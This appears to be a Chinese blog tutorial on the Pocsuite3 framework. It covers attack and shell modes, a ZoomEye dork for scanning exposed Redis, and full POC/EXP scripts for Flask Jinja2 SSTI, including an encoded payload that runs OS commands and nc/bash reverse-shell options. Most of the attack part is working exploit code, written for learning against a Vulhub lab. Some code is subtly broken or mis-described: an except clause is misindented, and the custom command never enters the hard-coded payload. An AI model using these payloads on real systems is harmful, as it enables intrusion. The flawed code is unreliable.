Pocsuite使用 - Guko's Blog

pocsuite是一款基于漏洞与POC的远程漏洞验证框架，记录基本使用和POC跟EXP编写的学习记录

0x01 安装

直接下载解压安装

1 2	wget https://github.com/knownsec/pocsuite3/archive/master.zip unzip master.zip

0x02 使用方法

Pocsuite具有两种交互模式，一种是命令行模式，另一种是控制台交互模式。–verify参数来调用verify方法，用于验证目标是否存在漏洞，–attack参数调用attack方法，用来向目标发起攻击。

1、verify验证模式，验证目标是否存在漏洞。-r为脚本路径，-u为目标地址

1	python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify

2、批量验证，将需要验证的所有目标IP写到一个txt文件中批量利用

1	python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url.txt --verify

3、加载文件夹下所有poc对目标进行测试，-r为文件夹路径

1	python3 pocsuite.py -r pocs/* -u url --verify

4、使用多线程。–threads表示线程数

1	python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --verify

5、使用Zoomey搜索引擎，搜索开放端口6379的Redis服务

1	python3 cli.py --dork 'port:6379' --vul-keyword 'redis' --max-page 2

6、Attack模式，向目标发起有效供给

1	python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --attack

7、使用shell交互式模式，对目标进行远程控制

1	python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --shell

8、使用自定义命令‘command’，调用外部传递参数，进行半交互式命令执行

1	python3 pocsuite.py -r pocs/test1.py(脚本路径) -u url --attack --command "whoami"

0x03 POC脚本编写

搭建Flask服务器模板环境

这里直接用VULHUB中的环境快速搭建

1
2
3

https://github.com/vulhub/vulhub/tree/master/flask/ssti
docker-compose build
docker-compose up -d

实际编写，将模版的_verify方法替换成Flask漏洞检测脚本既完成POC的编写

#!/usr/bin/python3
#新建一个符合POC命令规范的py文件
#编写POC实现类DemoPOC，继承自POCBase类
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY

class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1'] # POC作者名字
    vu1Date = '1.1' #漏洞公开时间
    updateDate = '1.1' #编写POC时间
    references = ['flask'] #漏洞地址来源
    name = 'flask' #POC名称
    appPowerLink = 'flask'#漏洞厂商主页地址
    appName = 'flask'#漏洞应用名称
    appVersion = '1.1' #漏洞影响版本
    vu1Type = '' #漏洞类型
    desc = '''
    test
    ''' #漏洞简要描述
    samples = ['00.00.00.00:8000'] #测试样例，使用POC测试成功的网站
    install_requires = []
    # 编写验证模式，在_verify方法中写入POC验证脚本
    def _verify(self):
        resu1t = {}
        path = "/?name="
        url = self.url + path
        payload = "{{22*22}}"
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                resu1t['VerifyInfo'] = {}
                resu1t['VerifyInfo']['URL'] = url
                resu1t['VerifyInfo']['name'] = payload
        except Exception as e:
            pass
        return self.parse_output(resu1t)

    def trim(str):
        newstr = ''
        for ch in str:  # 遍历每一个字符串
            if ch != ' ':
                newstr = newstr + ch
        return newstr
    #编写攻击模式，用_attack()函数中的写入EXP利用脚本，在攻击模式下可以不对目标进行getshell，查询管理员账户密码等操作
    def _attack(self):
        output = Output(self)
        result = {}
        # 攻击代码

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(DemoPOC)

0x04 EXP脚本编写

EXP脚本的编写与POC脚本编写一样，只需要修改_attack部分，替换成漏洞利用的脚本即可

def _attack(self):
  resu1t = {}
  path = "/?name="
  url = self.url + path
  payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
  try:
    resq = requests.get(url + payload)
    if resq and resq.status_code == 200 and "www" in resq.text:
      resu1t['VerifyInfo'] = {}
      resu1t['VerifyInfo']['URL'] = url
      resu1t['VerifyInfo']['name'] = payload
      except Exception as e:
        pass
      return self.parse_output(resu1t)

既完成EXP编写，运行如下

1	python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack

在Pocsuite3中，可以接受用户输入的命令行参数，对目标系统进行半交互控制。先要编写一个接受自定义命令的函数，将接收到的命令赋值给command参数

def _options(self):
    o = OrderedDict()
    payload = {
        "nc": REVERSE_PAYLOAD.NC,
        "bash": REVERSE_PAYLOAD.BASH,
    }
    o["command"] = OptDict(selected="bash", default=payload)
    return o

下面，创造一个cmd变量，用于接收用户输入的command命令参数，并嵌入payload字符串中。将写好的payload与url地址拼接，并通过requests函数发送到目标系统，即可在目标系统执行命令，将命令执行结果输出

def _attack(self):
    resu1t = {}
    path = "/?name="
    url = self.url + path
    payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
    try:
        resq = requests.get(url + payload)
        t = resq.text
        t = t.replace('\n', '').replace('\r', '')
        print(t)
        t = t.replace(" ","")
        if resq and resq.status_code == 200 and "www" in resq.text:
            resu1t['VerifyInfo'] = {}
            resu1t['VerifyInfo']['URL'] = url
            resu1t['VerifyInfo']['name'] = t
    except Exception as e:
        pass
    return self.parse_output(resu1t)

最终完成的代码

#!/usr/bin/python3
from collections import OrderedDict
from urllib.parse import urljoin
import re
from pocsuite3.api import POCBase, Output, register_poc, logger, requests, OptDict, VUL_TYPE
from pocsuite3.api import REVERSE_PAYLOAD, POC_CATEGORY

class DemoPOC(POCBase):
    vulID = '1.1'
    version = '1.1'
    author = ['1.1']  # POC作者名字
    vu1Date = '1.1'  # 漏洞公开时间
    updateDate = '1.1'  # 编写POC时间
    references = ['flask']  # 漏洞地址来源
    name = 'flask'  # POC名称
    appPowerLink = 'flask'  # 漏洞厂商主页地址
    appName = 'flask'  # 漏洞应用名称
    appVersion = '1.1'  # 漏洞影响版本
    vu1Type = ''  # 漏洞类型
    desc = '''
        test
        '''  # 漏洞简要描述
    samples = ['00.00.00.00:8000']  # 测试样例，使用POC测试成功的网站
    install_requires = []

    def _options(self):
        o = OrderedDict()
        payload = {
            "nc": REVERSE_PAYLOAD.NC,
            "bash": REVERSE_PAYLOAD.BASH,
        }
        o["command"] = OptDict(selected="bash", default=payload)
        return o
    def _verify(self):
        # output = Output(self)
        # result = {}
        resu1t = {}
        path = "/?name="
        url = self.url + path
        payload = "{{22*22}}"
        try:
            resq = requests.get(url + payload)
            if resq and resq.status_code == 200 and "484" in resq.text:
                resu1t['VerifyInfo'] = {}
                resu1t['VerifyInfo']['URL'] = url
                resu1t['VerifyInfo']['name'] = payload
        except Exception as e:
            pass
        return self.parse_output(resu1t)

    def _attack(self):
        resu1t = {}
        path = "/?name="
        url = self.url + path
        payload = 'name=%7B%25%20for%20c%20in%20%5B%5D.__class__.__base__.__subclasses__()%20%25%7D%0A%7B%25%20if%20c.__name__%20%3D%3D%20%27catch_warnings%27%20%25%7D%0A%20%20%7B%25%20for%20b%20in%20c.__init__.__globals__.values()%20%25%7D%0A%20%20%7B%25%20if%20b.__class__%20%3D%3D%20%7B%7D.__class__%20%25%7D%0A%20%20%20%20%7B%25%20if%20%27eval%27%20in%20b.keys()%20%25%7D%0A%20%20%20%20%20%20%7B%7B%20b%5B%27eval%27%5D(%27__import__("os").popen("whoami").read()%27)%20%7D%7D%0A%20%20%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endif%20%25%7D%0A%20%20%7B%25%20endfor%20%25%7D%0A%7B%25%20endif%20%25%7D%0A%7B%25%20endfor%20%25%7D'
        try:
            resq = requests.get(url + payload)
            t = resq.text
            t = t.replace('\n', '').replace('\r', '')
            print(t)
            t = t.replace(" ","")
            if resq and resq.status_code == 200 and "www" in resq.text:
                resu1t['VerifyInfo'] = {}
                resu1t['VerifyInfo']['URL'] = url
                resu1t['VerifyInfo']['name'] = t
        except Exception as e:
            pass
        return self.parse_output(resu1t)


    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

    def _shell(self):
        return

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output

register_poc(DemoPOC)

运行

1	python3 cli.py -r pocs/exp_flask.py -u http://127.0.0.1:8000 --attack --command 'id'

参考资料

python安全攻防渗透测试实战指南